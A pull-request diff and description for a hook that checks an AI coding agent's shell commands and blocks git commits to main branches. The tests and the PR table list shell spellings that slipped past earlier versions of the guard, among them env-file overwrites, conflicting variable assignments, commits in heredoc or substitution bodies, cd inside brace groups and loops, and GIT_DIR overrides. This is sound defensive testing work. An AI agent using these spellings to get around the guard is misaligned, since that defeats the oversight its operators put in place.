+    """🔴 REGRESSION 1 — TOCTOU. The guard reads an env file the command is
+    ABOUT TO OVERWRITE, and then judges on its stale contents.
+
+        printf 'WT=<main-repo>\\n' > /tmp/wt.env && . /tmp/wt.env \\
+          && git -C "$WT" commit -m x
+
+    A previous call left a safe worktree path in that file. Reading it NOW
+    resolves `$WT` to the safe worktree and ALLOWS, while the command commits
+    into `<main-repo>`. Measured: shipped guard DENY (unresolvable `-C`, cwd
+    fallback), PR #396 head ALLOW.
+
+    The cure is not to enumerate ways a shell can write a file — that
+    enumeration fails OPEN on the first spelling it misses — but to refuse any
+    path the line mentions twice.
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    safe = _mkrepo(tmp_path / "safe-repo", branch="feat/x")
+    env = tmp_path / "wt.env"
+    env.write_text(f"WT={safe}\n")      # what a PREVIOUS call left there
+    for cmd in [
+        f"printf 'WT={on_main}\\n' > {env} && . {env} && git -C \"$WT\" commit -m x",
+        f"echo 'WT={on_main}' | tee {env} && . {env} && git -C \"$WT\" commit -m x",
+        f"cat > {env} <<EOF\nWT={on_main}\nEOF\n. {env}\ngit -C \"$WT\" commit -m x",
+    ]:
+        assert gc.check_git_commit_to_main(cmd, str(on_main)) is not None, cmd
+    # …and the CONTROL that makes this a discriminator rather than a blanket
+    # refusal to read env files: the same source, with nothing writing it, still
+    # resolves and still allows.
+    assert gc.check_git_commit_to_main(
+        f". {env}\ngit -C \"$WT\" commit -m x", str(on_main)) is None
+
+
+def test_a_name_the_line_sets_TWICE_is_dropped_in_either_order(tmp_path):
+    """🔴 REGRESSION 2 — the precedence between a sourced file and the command
+    text was inverted. MEASURED in bash: `WT=a; . f` (f sets `WT=b`) leaves
+    **b** — the file is read LATER, so it wins — and `. f; WT=a` leaves **a**.
+    PR #396 made the command text win unconditionally, so
+
+        WT=<safe-worktree>
+        . <file naming main>
+        git -C "$WT" commit -m x
+
+    resolved to the safe worktree and ALLOWED while bash committed into main.
+
+    The fix is NOT to invert the precedence. Whichever source is later, a name
+    the line gives two different literals is one the guard would have to GUESS
+    about — bash's answer depends on control flow this walk cannot see — so it is
+    dropped and the cwd fallback applies, in BOTH orders. That is never more
+    permissive than the shipped guard, which could not resolve the name at all.
+
+    The fixture makes the three hypotheses give three different verdicts: the
+    cwd is a repo on `main`, and the two candidate values are on `feat/a` and
+    `feat/b`. Only "dropped -> judge the cwd" denies.
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    safe = _mkrepo(tmp_path / "safe-repo", branch="feat/a")
+    other = _mkrepo(tmp_path / "other-repo", branch="feat/b")
+    env_a = tmp_path / "a.env"
+    env_a.write_text(f"WT={other}\n")
+    for cmd in [
+        f'WT={safe}\n. {env_a}\ngit -C "$WT" commit -m x',   # text then file
+        f'. {env_a}\nWT={safe}\ngit -C "$WT" commit -m x',   # file then text
+        f'WT={safe}\nWT={other}\ngit -C "$WT" commit -m x',  # text then text
+    ]:
+        reason = gc.check_git_commit_to_main(cmd, str(on_main))
+        assert reason is not None, cmd
+        assert str(on_main) in reason, cmd
+    # …and the CONTROL: one consistent value, from either source, still resolves.
+    env_same = tmp_path / "same.env"
+    env_same.write_text(f"WT={safe}\n")
+    assert gc.check_git_commit_to_main(
+        f'WT={safe}\n. {env_same}\ngit -C "$WT" commit -m x', str(on_main)) is None
+    assert gc.check_git_commit_to_main(
+        f'. {env_same}\ngit -C "$WT" commit -m x', str(on_main)) is None
+
+
+def test_a_command_PREFIX_assignment_does_not_persist(tmp_path):
+    """🔴 REGRESSION 3 — a prefix assignment was recorded as persistent.
+    MEASURED: `WT=x true; printf '%s' "${WT-<unset>}"` prints `<unset>`, so
+
+        WT=<safe-worktree> true
+        git -C "$WT" commit -m x
+
+    leaves `$WT` EMPTY in a real shell — the guard must not resolve it to the
+    safe worktree. It falls back to the cwd instead, which denies.
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    safe = _mkrepo(tmp_path / "safe-repo", branch="feat/x")
+    assert gc.check_git_commit_to_main(
+        f'WT={safe} true\ngit -C "$WT" commit -m x', str(on_main)) is not None
+    # …while the forms that DO persist still resolve. Measured: a bare
+    # assignment, `export`, and a BRACE GROUP all survive; `( … )` does not.
+    assert gc.check_git_commit_to_main(
+        f'WT={safe}\ngit -C "$WT" commit -m x', str(on_main)) is None
+    assert gc.check_git_commit_to_main(
+        f'export WT={safe}\ngit -C "$WT" commit -m x', str(on_main)) is None
+
+
+@pytest.mark.parametrize("template", [
+    "cd {main}\nbash <<'EOF'\ngit commit -m x\nEOF",
+    "cd {main}\n$(git commit -m x)",
+    "cd {main}\n`git commit -m x`",
+    "cd {main}; bash <<'EOF'\ngit commit -m x\nEOF",
+])
+def test_a_body_is_judged_at_the_cwd_it_actually_RUNS_IN(tmp_path, template):
+    """🔴 REGRESSION 4 — heredoc / `$( )` / backtick bodies discarded the tracked
+    cwd and were judged at the caller's. MEASURED: `cd /tmp; bash <<'EOF' … pwd
+    … EOF` prints `/tmp`, and so does `$(pwd)`. So
+
+        cd <main-repo>
+        bash <<'EOF'
+        git commit -m x
+        EOF
+
+    really does commit into `<main-repo>`; PR #396 judged it at the caller's cwd
+    and ALLOWED it.
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    innocent = _mkrepo(tmp_path / "innocent", branch="feat/x")
+    cmd = template.format(main=on_main)
+    assert gc.check_git_commit_to_main(cmd, str(innocent)) is not None, cmd
+
+
+def test_a_body_is_judged_where_it_SITS_not_at_the_lines_final_cwd(tmp_path):
+    """The other direction of the same rule, and the reason bodies carry the
+    index of the segment that opened them. A body BEFORE a `cd` must not be
+    judged at the directory that `cd` reaches — otherwise the fix trades a miss
+    for a false positive.
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    safe = _mkrepo(tmp_path / "safe-repo", branch="feat/x")
+    assert gc.check_git_commit_to_main(
+        f"cd {safe}\nbash <<'EOF'\ngit commit -m x\nEOF\ncd {on_main}\nls",
+        str(on_main)) is None
+
+
+def test_a_heredoc_body_sees_EXPORTED_variables_and_only_those(tmp_path):
+    """🔴 REGRESSION 4b, found by the bash-oracle fuzz rather than by reading.
+    A heredoc body feeds a NEW process. MEASURED:
+
+        WT=x;        bash <<'EOF' … "${WT-<unset>}" … EOF   ->  <unset>
+        export WT=x; bash <<'EOF' … "${WT-<unset>}" … EOF   ->  x
+
+    Both directions are permissive if modelled wrong, which is why the pair is
+    asserted rather than one arm:
+
+      * passing a NON-exported name in lets
+        `WT=<safe>; bash <<EOF / git -C "$WT" commit / EOF` resolve to the safe
+        worktree, when bash resolves `$WT` to nothing and the body runs in the
+        cwd — here a repo on `main`.
+      * withholding an EXPORTED one loses a real deny:
+        `export WT=<main> && cd <safe> && bash <<EOF / git -C "$WT" commit / EOF`
+        commits into `<main>` while the body's own cwd is innocent. That exact
+        shape was a MISS until this was modelled.
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    safe = _mkrepo(tmp_path / "safe-repo", branch="feat/x")
+    body = "bash <<'EOF'\ngit -C \"$WT\" commit -m x\nEOF"
+    # not exported -> the body cannot see it -> judged at the body's cwd (main)
+    assert gc.check_git_commit_to_main(
+        f"WT={safe}\n{body}", str(on_main)) is not None
+    # exported -> the body CAN see it -> judged on the repo it names
+    assert gc.check_git_commit_to_main(
+        f"export WT={safe}\n{body}", str(on_main)) is None
+    assert gc.check_git_commit_to_main(
+        f"export WT={on_main}\ncd {safe}\n{body}", str(safe)) is not None
+    # …and a `$( )` substitution IS the same shell, so it sees both.
+    assert gc.check_git_commit_to_main(
+        f'WT={on_main}\n$(git -C "$WT" commit -m x)', str(safe)) is not None
+
+
+def test_every_value_an_AMBIGUOUS_name_was_given_is_judged(tmp_path):
+    """🔴 The other half of "a name set twice is dropped". Dropping alone falls
+    back to the cwd, and the bash-oracle fuzz found the miss that leaves: from an
+    INNOCENT cwd, `WT=<safe>; WT=<main>; git -C "$WT" commit` commits into
+    `<main>` (bash is last-write-wins) while a guard that only knows "ambiguous"
+    judges the innocent cwd and allows it.
+
+    So every literal the name was ever given is judged as well. The control
+    below is what keeps that from being a blanket refusal: two SAFE values still
+    allow, and an ambiguous name the argv does not reference is not dragged in.
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    safe_a = _mkrepo(tmp_path / "a", branch="feat/a")
+    safe_b = _mkrepo(tmp_path / "b", branch="feat/b")
+    assert gc.check_git_commit_to_main(
+        f'WT={safe_a}\nWT={on_main}\ngit -C "$WT" commit -m x',
+        str(safe_b)) is not None
+    assert gc.check_git_commit_to_main(
+        f'WT={on_main}\nWT={safe_a}\ngit -C "$WT" commit -m x',
+        str(safe_b)) is not None
+    # CONTROL 1: two safe values -> still allowed.
+    assert gc.check_git_commit_to_main(
+        f'WT={safe_a}\nWT={safe_b}\ngit -C "$WT" commit -m x',
+        str(safe_b)) is None
+    # CONTROL 2: the ambiguous name is not referenced by this argv, so its
+    # values must not be judged.
+    assert gc.check_git_commit_to_main(
+        f'OTHER={safe_a}\nOTHER={on_main}\ngit -C {safe_b} commit -m x',
+        str(safe_b)) is None
+
+
+@pytest.mark.parametrize("template", [
+    "{{ cd {main}; git commit -m x; }}",
+    "{{ cd {main}; }}; git commit -m x",
+    "! cd {main}; git commit -m x",
+    "if true; then cd {main}; git commit -m x; fi",
+    "for i in 1; do cd {main}; git commit -m x; done",
+    "while true; do cd {main}; git commit -m x; done",
+    "until false; do cd {main}; git commit -m x; done",
+    "cd {main} || true; git commit -m x",
+])
+def test_a_cd_behind_a_brace_group_or_a_keyword_still_moves_the_cwd(tmp_path,
+                                                                    template):
+    """🔴 REGRESSION 5 — `cd` was recognised only as argv[0]. The regex it
+    replaced matched a `cd` after any of `[;&|(){}'"]`, which covered brace
+    groups and reserved words; a walk keyed on argv[0] does not.
+
+    MEASURED in bash 5.3.15: the cwd really does move in every shape below —
+    `{ cd /tmp; }`, `if/then`, `for/do`, `until/do` and `! cd` all leave `$PWD`
+    at `/tmp`. Only `( … )` contains it.
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    innocent = _mkrepo(tmp_path / "innocent", branch="feat/x")
+    cmd = template.format(main=on_main)
+    assert gc.check_git_commit_to_main(cmd, str(innocent)) is not None, cmd
+
+
+def test_a_commit_inside_a_brace_group_is_seen_at_all(tmp_path):
+    """The same token-skipping, on the COMMAND rather than on the `cd`. A
+    segment whose first token is `{` or a reserved word used to have that token
+    as argv[0], so the commit inside was invisible. Green here, RED on both the
+    shipped guard and PR #396."""
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    for cmd in ["{ git commit -m x; }", "if true; then git commit -m x; fi",
+                "! git commit -m x"]:
+        assert gc.check_git_commit_to_main(cmd, str(on_main)) is not None, cmd
+
+
+# --- 10b. THE SECONDARY FINDINGS ------------------------------------------- #
+
+def test_four_levels_of_heredoc_nesting_do_not_lose_the_commit(tmp_path):
+    """One `_depth` budget used to be spent on BOTH the body recursion and the
+    nested-shell recursion, so a fourth level exhausted it and the commit inside
+    was never parsed. Measured: shipped guard DENY, PR #396 head ALLOW. The
+    budgets are now independent."""
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    cmd = ("bash <<'A'\nbash <<'B'\nbash <<'C'\nbash <<'D'\n"
+           "git commit -m x\nD\nC\nB\nA")
+    assert gc.check_git_commit_to_main(cmd, str(on_main)) is not None
+
+
+def test_a_GIT_DIR_target_is_judged_IN_ADDITION_to_a_resolving_dash_C(tmp_path):
+    """🔴 A COMMENT IS A CLAIM TOO. Two docstrings said `GIT_DIR=` is judged *in
+    addition to* `-C`; the code dropped it the moment a `-C` resolved. Measured
+    on BOTH the shipped guard and PR #396:
+
+        ALLOW  GIT_DIR=<main>/.git GIT_WORK_TREE=<main> git -C <safe> commit -m x
+
+    even though `GIT_DIR` OVERRIDES the working directory, so that command
+    commits into `<main>`. The docstring was right and the code was wrong; the
+    CODE moved. (Fixing the comment instead would have left a real hop open.)
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    safe = _mkrepo(tmp_path / "safe-repo", branch="feat/x")
+    assert gc.check_git_commit_to_main(
+        f"GIT_DIR={on_main}/.git GIT_WORK_TREE={on_main} git -C {safe} commit -m x",
+        str(safe)) is not None
+    # …and the plain hop, which already denied, still does.
+    assert gc.check_git_commit_to_main(
+        f"GIT_DIR={on_main}/.git GIT_WORK_TREE={on_main} git commit -m x",
+        str(safe)) is not None
+
+
+def test_dash_c_dir_does_not_need_an_unresolved_list(tmp_path):
+    """`unresolved` defaulted to None and was appended to unconditionally — a
+    latent AttributeError on the first caller that omitted it. On a check whose
+    exceptions become a BLANKET deny of every command in the session, that is
+    not a cosmetic bug."""
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    assert gc._dash_c_dir(["git", "-C", "/definitely/not/here", "commit"],
+                          str(on_main)) == str(on_main)
+
+
+def test_the_hot_path_gate_is_the_same_walk_it_guards(tmp_path, monkeypatch):
+    """🔴 THE GATE AND THE LOOP MUST SCAN ONE POPULATION. Variable resolution can
+    open a sourced env file, and this hook runs on EVERY Bash call — so the read
+    sits behind an "is there a real `git … commit` here at all?" gate. That gate
+    is the SAME function with `_novars=True`, not a second parse: a gate built
+    from a different parse can admit work the loop does not need and, worse, can
+    miss a commit the loop would have judged.
+
+    Pinned as a count of `open()` calls WITH A POSITIVE CONTROL, so a zero cannot
+    be a probe wired to nothing.
+    """
+    repo = _mkrepo(tmp_path / "r", branch="trunk")
+    env = tmp_path / "wt.env"
+    env.write_text("WT=/tmp/whatever\n")
+    opened = []
+    real_open = open
+    monkeypatch.setattr(
+        "builtins.open",
+        lambda f, *a, **k: (opened.append(str(f)), real_open(f, *a, **k))[1])
+    for cmd in ["ls -la", f". {env}; ls", "git status", "git add x",
+                f". {env}\ngit commit --dry-run", "kubectl get pods"]:
+        gc.evaluate(cmd, "claude-code", str(repo))
+    assert not [o for o in opened if str(env) in o], opened
+    # …the positive control: with a REAL commit present, it IS read.
+    gc.evaluate(f". {env}\ngit -C \"$WT\" commit -m x", "claude-code", str(repo))
+    assert [o for o in opened if str(env) in o], "the env file was never read at all"
+    # …and the gate agrees with the loop about what a commit IS: a body-nested
+    # commit must open the gate too, or the loop below it never runs.
+    walked = gc._commands_with_cwd("bash <<'EOF'\ngit commit -m x\nEOF",
+                                   str(repo), _novars=True)
+    assert any(gc._is_real_git_commit(a) for a, *_ in walked)
+
+
+# --- 10c. THE MUTATION TARGETS --------------------------------------------- #
+
+def test_literal_value_refuses_anything_carrying_a_dollar(tmp_path):
+    """M10. Accepting `$` would let a HALF-resolved value name a directory: with
+    `HOME` unknown to the guard, `$HOME/../devrc` is a guess, and a resolver that
+    guesses is how this check started naming repos the command never touches."""
+    assert gc._literal_value("/tmp/wt-1") == "/tmp/wt-1"
+    assert gc._literal_value("'/tmp/wt-1'") == "/tmp/wt-1"
+    assert gc._literal_value("/tmp/wt-$$") is None
+    assert gc._literal_value("$HOME/x") is None
+    assert gc._literal_value("`pwd`") is None
+    assert gc._literal_value("") is None
+    assert gc._literal_value(None) is None
+
+
+def test_an_oversized_env_file_is_not_read(tmp_path):
+    """M20. The path is model-controlled input; the size cap is what stops the
+    guard slurping an arbitrary file on every Bash call. Both arms asserted, so
+    removing the cap goes red rather than merely getting slower."""
+    repo = _mkrepo(tmp_path / "clone", branch="trunk", commit=True)
+    safe = _mkrepo(tmp_path / "safe", branch="feat/x")
+    small = tmp_path / "small.env"
+    small.write_text(f"WT={safe}\n")
+    assert gc._env_file_vars(str(small), None, {}) == {"WT": str(safe)}
+    big = tmp_path / "big.env"
+    big.write_text(f"WT={safe}\n" + "#" + "x" * (gc._ENV_FILE_MAX_BYTES + 10) + "\n")
+    assert gc._env_file_vars(str(big), None, {}) == {}
+    assert gc.check_git_commit_to_main(
+        f'. {big}\ngit -C "$WT" commit -m x', str(repo)) is not None
+
+
+def test_dash_dash_strips_tabs_only_for_the_dash_form(tmp_path):
+    """M3. `<<-` strips leading tabs from the terminator; plain `<<` does not.
+    Always stripping would let an INDENTED line close a plain heredoc early,
+    re-partitioning everything after it."""
+    _s, _u, bodies = gc._scan("cat <<EOF\n\tEOF\nreal body\nEOF")
+    assert bodies == ["\tEOF\nreal body"], bodies
+    _s, _u, bodies = gc._scan("cat <<-EOF\n\tEOF\nnot in the body")
+    assert bodies == [""], bodies
+
+
+def test_a_cd_target_is_the_FIRST_operand_not_the_last(tmp_path):
+    """M14. Taking the last operand `cd`s to a redirection target or to `--`.
+    Both shapes below really do change directory to `<main>` in bash."""
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    innocent = _mkrepo(tmp_path / "innocent", branch="feat/x")
+    log = tmp_path / "log"
+    log.mkdir()
+    assert gc.check_git_commit_to_main(
+        f"cd {on_main} > {log}/out; git commit -m x", str(innocent)) is not None
+    assert gc.check_git_commit_to_main(
+        f"pushd {on_main} > {log}/out; git commit -m x", str(innocent)) is not None
+
+
+def test_a_variable_assigned_twice_is_not_guessed(tmp_path):
+    """Ambiguity falls back to the cwd rather than picking a winner.
+
+    🔴 THE FIXTURE IS THE TEST. An earlier version assigned the variable a safe
+    worktree and then the cwd's own repo, so "poisoned -> cwd fallback" and
+    "last assignment wins" produced the SAME verdict and the test discriminated
+    nothing. Here the two values and the cwd are three DIFFERENT repos on three
+    different branches, so each hypothesis gives a different answer:
+        poisoned  -> judged at the cwd (on `main`)      -> DENY   <- required
+        first wins  -> judged at safe_a (feat/a)        -> allow
+        last wins   -> judged at safe_b (feat/b)        -> allow
+    """
+    on_main = _mkrepo(tmp_path / "main-repo", branch="main")
+    safe_a = _mkrepo(tmp_path / "a", branch="feat/a")
+    safe_b = _mkrepo(tmp_path / "b", branch="feat/b")
+    reason = gc.check_git_commit_to_main(
+        f'WT={safe_a}\nWT={safe_b}\ngit -C "$WT" commit -m x', str(on_main))
+    assert reason is not None
+    assert str(on_main) in reason, reason
+    assert str(safe_a) not in reason and str(safe_b) not in reason
+
+
+# --- 10d. THE CONTROLS ------------------------------------------------------ #
+# 🔴 Read this section before believing any of the above. A fix for a false
+# positive is only as good as the denies it leaves standing.
+
+@pytest.mark.parametrize("branch", ["main", "master", "trunk"])
+def test_control_commit_in_a_clone_on_a_main_branch_still_blocks(tmp_path, branch):
+    repo = _mkrepo(tmp_path / "r", branch=branch)
+    assert gc.evaluate("git commit -m x", "claude-code", str(repo)) is not None
+
+
+def test_control_dash_c_resolution_is_not_a_bypass_vector(tmp_path):
+    """Honouring `-C` must not become a way OUT. A `-C` that names a repo on a
+    main branch denies, from any cwd — including a topic-branch worktree, which
+    is the cwd an evader would pick."""
+    repo, wt = _trunk_and_worktree(tmp_path)
+    for cmd in [
+        f"git -C {repo} commit -m x",
+        f"git -C {repo} commit -q -F - <<'MSG'\nit's a message\nMSG",
+        f'REPO={repo}\ngit -C "$REPO" commit -m x',
+        f"cd {repo} && git commit -m x",
+        f"(cd {repo} && git commit -m x)",
+        f"bash -c 'cd {repo} && git commit -m x'",
+        f"GIT_DIR={repo}/.git GIT_WORK_TREE={repo} git commit -m x",
+    ]:
+        assert gc.evaluate(cmd, "claude-code", str(wt)) is not None, cmd
+
+
+def test_control_variable_resolution_never_unblocks_a_blocked_repo(tmp_path):
+    """The generalisation: resolving `$VAR` may only change WHICH repo is
+    judged, never whether the verdict is read at all."""
+    repo, wt = _trunk_and_worktree(tmp_path)
+    env = tmp_path / "bad.env"
+    env.write_text(f"WT={repo}\n")
+    assert gc.check_git_commit_to_main(
+        f'. {env}\ngit -C "$WT" commit -m x', str(wt)) is not None
+    assert gc.check_git_commit_to_main(
+        f'WT={repo}\ngit -C "$WT" commit -m x', str(wt)) is not None
+
+
+def test_control_a_heredoc_BODY_cannot_inject_a_variable(tmp_path):
+    """🔴 A hole this change could open in itself. Variable resolution reads the
+    real command line only — if a heredoc body's lines registered assignments,
+    the COMMIT MESSAGE would decide which repository the guard judges."""
+    repo, wt = _trunk_and_worktree(tmp_path)
+    assert gc.check_git_commit_to_main(
+        f"git commit -q -F - <<'MSG'\ndocs: a message containing WT={wt}\nMSG",
+        str(repo)) is not None
+    assert gc.check_git_commit_to_main(
+        f'git -C "$WT" commit -q -F - <<\'MSG\'\nWT={wt}\nMSG',
+        str(repo)) is not None
+
+
+def test_control_an_unresolvable_dash_c_says_so_in_the_deny(tmp_path, monkeypatch):
+    """The fallback still fires, and now EXPLAINS itself — a deny naming a repo
+    the command never mentioned is what made the original false positive so hard
+    to read."""
+    monkeypatch.delenv(_UNSET_HANDLE, raising=False)
+    repo = _mkrepo(tmp_path / "r", branch="trunk")
+    reason = gc.check_git_commit_to_main(
+        f"git -C ${_UNSET_HANDLE} commit -m x", str(repo))
+    assert reason is not None
+    assert "could not resolve" in reason
+    assert _UNSET_HANDLE in reason
+
+
+# --- 10e. THE POSITIVES — the workflow this change exists to enable --------- #
+
+def test_positive_dash_c_into_a_worktree_on_a_topic_branch(tmp_path):
+    repo, wt = _trunk_and_worktree(tmp_path)
+    assert gc.evaluate(f"git -C {wt} commit -m x", "claude-code", str(repo)) is None
+
+
+def test_positive_a_subshell_cd_into_that_worktree(tmp_path):
+    repo, wt = _trunk_and_worktree(tmp_path)
+    assert gc.evaluate(f"(cd {wt} && git commit -m x)", "claude-code",
+                       str(repo)) is None
+
+
+@pytest.mark.parametrize("template", [
+    'git -C "$WT" commit -m x',
+    'git -C "$WT" commit -q -F -',
+    '(cd "$WT" && git commit -m x)',
+    'bash -c \'cd "$WT" && git commit -m x\'',
+    'git -C ${WT} commit -m x',
+])
+def test_positive_a_variable_naming_the_worktree_resolves(tmp_path, template):
+    """🔴 THE ORIGINAL FALSE POSITIVE. `WT=…` is set by the command itself, so
+    the hook process's environment can never carry it — `expandvars` alone was
+    structurally unable to answer, and the fallback then named the wrong repo."""
+    repo, wt = _trunk_and_worktree(tmp_path)
+    cmd = f"WT={wt}\n{template}"
+    assert gc.check_git_commit_to_main(cmd, str(repo)) is None, cmd
+
+
+def test_positive_a_sourced_env_file_supplies_the_worktree_path(tmp_path):
+    """🔴 THE EXACT INCIDENT SHAPE. The mandated recipe is `WT=/tmp/wt-$$`, whose
+    value depends on the SHELL's pid and can never be read from the text — so the
+    observed pattern is to write the expanded path into a scratchpad env file and
+    `. ` it in later calls."""
+    repo, wt = _trunk_and_worktree(tmp_path)
+    env = tmp_path / "wt.env"
+    env.write_text(f"WT={wt}\n")
+    assert gc.check_git_commit_to_main(
+        f'. {env}\ngit -C "$WT" commit -q -F - <<\'MSG\'\ndocs: a message\nMSG',
+        str(repo)) is None


### PR DESCRIPTION
#396 merged as ONE change after an adversarial audit judged it *"needs rework —
do not merge as one change"*. Its branch-resolution half is now on `main`, and
the four regressions that audit measured are **live**, along with eleven more
found here.

Every row is `check_git_commit_to_main(cmd, cwd)` against real `git init`
fixtures — a repo on `main`, a repo on `trunk`, a linked worktree on a topic
branch. In each one the guard resolves to a repo the command does **not** commit
into. `cwd` is an innocent repo unless noted.

| command | `main` | here |
|---|---|---|
| `printf 'WT=<main>' > f && . f && git -C "$WT" commit` | **ALLOW** | DENY |
| `echo 'WT=<main>' \| tee f && . f && git -C "$WT" commit` | **ALLOW** | DENY |
| `WT=<safe>; . <file setting WT=<main>>; git -C "$WT" commit` | **ALLOW** | DENY |
| `WT=<safe> true; git -C "$WT" commit` *(cwd on main)* | **ALLOW** | DENY |
| `cd <main>; bash <<'EOF' / git commit / EOF` | **ALLOW** | DENY |
| `cd <main>; $(git commit -m x)` | **ALLOW** | DENY |
| ``cd <main>; `git commit -m x` `` | **ALLOW** | DENY |
| `{ cd <main>; git commit -m x; }` | **ALLOW** | DENY |
| `{ cd <main>; }; git commit -m x` | **ALLOW** | DENY |
| `! cd <main>; git commit -m x` | **ALLOW** | DENY |
| `if true; then cd <main>; git commit -m x; fi` | **ALLOW** | DENY |
| `for i in 1; do cd <main>; git commit -m x; done` | **ALLOW** | DENY |
| `while true; do cd <main>; git commit -m x; done` | **ALLOW** | DENY |
| 4 levels of `bash <<EOF` nesting around a commit | **ALLOW** | DENY |
| `GIT_DIR=<main>/.git … git -C <safe> commit` | **ALLOW** | DENY |

The four worktree spellings #396 exists to enable stay **ALLOWED**, including via
a `$VAR` and via a sourced env file.

## 🔴 The model is bash's, and it was measured — not reasoned

bash 5.3.15, via `printf '%s' "$PWD"` / `"${WT-<unset>}"` after each shape:

```
WT=a; . f  (f sets WT=b)   -> b       the sourced file is read LATER
. f; WT=a                  -> a       …so it is POSITION, not precedence
WT=x true                  -> unset   a command PREFIX does not persist
WT=x / export WT=x         -> x       a bare assignment does
(WT=x) / (cd /tmp)         -> unset / cwd unchanged   `( … )` is a scope
{ WT=x; } / { cd /tmp; }   -> x / /tmp                a brace group is NOT
if/then, for/do, ! cd      -> cwd MOVES in all three
cd /tmp; bash <<EOF …pwd…  -> /tmp    a body runs at the CURRENT cwd
WT=x;        bash <<EOF …$WT…  -> unset
export WT=x; bash <<EOF …$WT…  -> x   only EXPORTED names cross into a body
```

#396 got four of those backwards. Each is a test here, RED against `main`.

## What changed

- **`_command_vars` (a whole-line pre-pass) is gone.** Variables and the cwd are
  resolved in **one positional walk** with a subshell scope stack, because they
  interleave: a `cd` can precede the `. <file>` that names the next one.
- A name the line sets to two different literals is **dropped** rather than
  resolved to the later one — bash's answer depends on control flow this walk
  cannot see — and **every literal it was given is judged in addition**, so
  "I don't know" cannot become "allow".
- **A sourced file the command itself writes is refused.** Not by enumerating
  the ways a shell can write a file (that enumeration fails open on the first
  one it misses) but by refusing any path the line mentions twice.
- `_SHELL_NOISE` skips `{`, `!`, `then`, `do`, … before the command word, so
  `cd` is found where the old `_CD_ANY` regex found it. This also makes
  `{ git commit -m x; }` visible **at all** — neither `main` nor #396 saw it.
- Bodies carry the **index of the segment that opened them**, so they are judged
  where they sit — not at the caller's cwd (#396) and not at the line's final
  cwd (the mirror-image bug, also tested).
- Independent body / nested-shell recursion budgets (4-level heredoc nesting).
- `GIT_DIR=` is judged **in addition** to a resolving `-C`, which is what two
  docstrings already claimed. **The comment was right and the code was wrong;
  the code moved.**
- The hot-path gate is the **same walk** with `_novars=True`, so gate and loop
  cannot scan two populations that neither dominates.
- `unresolved` defaults to a list — a latent `AttributeError` on a check whose
  exceptions become a *blanket* deny of every command in the session.
- #395's "a named target that is not a worktree must not suppress the cwd check"
  and #403's "the command's own assignment beats an ambient export" (including
  pinning a poisoned name to `_UNRESOLVABLE` rather than leaving it absent, so it
  cannot fall through to a stale export) are both preserved, and their tests
  still gate them.

## 🔴 A deny this change had to buy back

`main` reads the **second** `<` of `<<<x` as `<<` + tag `x` and swallows the rest
of the text as a heredoc body. That is wrong — and fixing it **loses denies**: a
body is reparsed with fresh quote state, so main's misparse accidentally exposes
argv that the correct reading leaves inside a balanced quote. Seven inputs
across `git stash`, `git clean`, `mkfs`, `dd`, `pkill` and `talosctl` DENY on
`main` and ALLOW on a scanner that merely fixes the here-string.

So `split_commands` unions **three readings** — correct-bash, main's, and the
pre-heredoc-fix one — gated on a computed `diverged` flag. *Being right about
bash is not a licence to lose a deny.* (Dropping the alternative readings'
**bodies**, rather than their segments, silently lost all seven with the flag and
the arm both correct — which is why that test is behavioural, not structural.)

## Verification

**58 new tests.** No test name shadows another — asserted while merging, because
pytest keeps only the last definition and a shadowed name deletes main's
coverage while the suite still reports *more* tests than before.

| gate | result |
|---|---|
| `scripts/run-tests.sh --set hermetic` | `collected=7509 passed=7508 skipped=1 failed=0` · **RESULT: PASS** |
| `test_guard_core.py` | **collected=1442, passed=1442** (floor 1260) |
| `test_bash_guard.py` | `RESULT: all good` |

**🔴 A bash-oracle differential — the evidence that matters.** The same generated
command runs twice: once with the commit replaced by a probe that records
`$PWD`/`$WT`, so **bash** decides which repo it lands in, and once through
`check_git_commit_to_main`. Expected = DENY iff bash landed in a blocked repo.

| guard | misses (bash lands in a blocked repo, guard ALLOWs) |
|---|---|
| #396's head *(instrument validation)* | **64** |
| `origin/main` (`a91b207`) | **64** |
| this change | **0** at seeds 7 / 11 / 23 |

1,400 generated, 1,081 with a live probe, 438 landing in a blocked repo. False
positives 36–53 — the direction a guard may err in.

- **Verdict fuzz vs `main` (`a91b207`)**, 20,000 inputs: **DENY→ALLOW = 0**;
  positive control ALLOW→DENY = 6.
- **20 semantic mutants, all KILLED**, each by a named test — including the six
  the audit named as surviving in #396 (bodies-at-cwd, sourced-file-wins,
  `_literal_value` accepting `$`, the env-file size cap, `<<-` always stripping
  tabs, the `cd` target from the last operand), plus "drop the union arm", "drop
  the alternative readings' bodies", "the divergence gate under-reports", and
  "#395's rule is dropped".
- `test_a_variable_assigned_twice_is_not_guessed` is **replaced**: its fixture
  collapsed "poisoned → cwd fallback" and "last assignment wins" into one
  verdict, so it discriminated nothing. The three candidates are now three repos
  on three branches.
- **Parse cost** (min of 7 × 200 reps): ordinary command lines 0.032 → 0.037 ms
  (`diverged=False`, one scan); heredoc-carrying text pays for all three
  readings — 400-line 4.7 → 10.8 ms.

## Rebased onto `a91b207`

This branch was rebased twice while open: `main` gained #396, #395 and #403
during the work. Every number above is measured against `a91b207`, not against
the branch point. #403's two fixes (cvars-before-environment, and pinning a
poisoned name unresolvable) are adopted rather than reverted.

## Supersedes #402

#402 was the scanner half of #396 extracted to ship alone, opened before #396
merged. #396 is now on `main`, so that PR's premise ("the bypass is deployed
right now") is false and it conflicts. Its one piece of surviving value — the
union that keeps a scanner change from losing a deny — is carried here, extended
to three readings. #402 is closed.

## 🔴 Not live

`~/.claude/hooks/guard_core.py` resolves into `/nix/store` — a home-manager
`home.file` **copy**. Merging this changes nothing on either host until someone
runs `home-manager switch`. **None was run as part of this work.**

